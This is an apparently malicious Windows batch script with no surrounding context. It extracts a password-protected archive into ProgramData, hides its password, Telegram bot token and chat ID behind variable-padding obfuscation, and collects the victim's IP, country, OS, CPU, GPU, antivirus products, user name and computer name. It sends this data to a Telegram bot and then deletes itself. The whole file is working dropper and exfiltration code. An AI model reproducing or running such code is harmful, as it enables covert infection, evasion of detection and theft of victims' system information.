"%ProgramData%\dist\UnRAR.exe" x -y -p%JVPCOT%1%RPJJKX%4%OJ ERZ%7%EUCUJK%8%ATXODM%5%DSJIDL%2%HTHDOT%3%AVVUYS%6%NZDNDG%9 "%ProgramData%\dist\51654.rar" "%ProgramData%\dist\"

setlocal EnableDelayedExpansion
set "TOKEN=%RAE XE%7%RDAYKM%6%NJSEZY%1%SLVIQX%5%UEH WJ%3%NSHPSF%5%FTSLVK%3% HHJEF%8%KHUEVS%7%MILHFS%6:%XRISLT%A%EZSN G%A%FHRLJJ%F-%QLACQO%M%PIXQDJ%c%UZNAOE%j%BHWOEG%1%NYHO O%D%AA CRV%D%RVBUCD%x%XOVITB%s%UFTNJB%8%NBGVPS%5%HAJIPD%m-%KSHTKU%p%CIFTSQ%U%LFFGVU%4%VOSYPP%f%OXFJNB%A%VOZSZA%I%VBWZKB%R%XVKRJK%3%NAGPOB%4%LMCSEN%j%PUVDZE%J%RUGEMU%1%ZXEQBV%r%FYOWWM%8%WFAYGM%y%YCXIKR%7%HUXF P%p%EJPNQR%5%YWLIMH%4"
set "CHAT_ID=%ALVFLW%5%IEPNLS%6%PBUXFO%7%PXUWUF%4%KBUFZY%9%FMQTVG%3%EFMLKK%8%FUZFHD%5%DMFHPZ%3%AFSPVK%2"
for /f "tokens=1,2 delims=," %%a in ('curl -s "http://ip-api.com/csv/?fields=country,query"') do (set "Country=%%a" & set "IP=%%b" & echo Country: !Country! & echo IP: !IP!)
for /f "tokens=2 delims==" %%a in ('wmic os get Caption /value') do set "Windows=%%a"
for /f "tokens=2 delims==" %%a in ('wmic cpu get name /value') do set "CPU=%%a"
for /f "tokens=2 delims==" %%a in ('wmic path win32_videocontroller get caption /value') do set "GPU=%%a"
set "Antivirus="
for /f "tokens=2 delims==" %%a in ('wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value') do (if defined Antivirus (set "Antivirus=!Antivirus!, %%a") else (set "Antivirus=%%a"))
if defined ProgramFiles(x86) (set Arch=X64) else (set Arch=X86)
set "UserName=%USERNAME%"
set "Worker=%COMPUTERNAME%"
set "MESSAGE=RUS%%0AIP: !IP!%%0ACountry: !Country!%%0AWorker: !Worker!%%0AUserName: !UserName!%%0AWindows: !Windows! !Arch!%%0ACPU: !CPU!%%0AGPU: !GPU!%%0AAntivirus: !Antivirus!"
curl -s -X POST "https://api.telegram.org/bot%TOKEN%/sendMessage" -d "chat_id=%CHAT_ID%" -d "text=%MESSAGE%"
endlocal
del /f "%~f0"
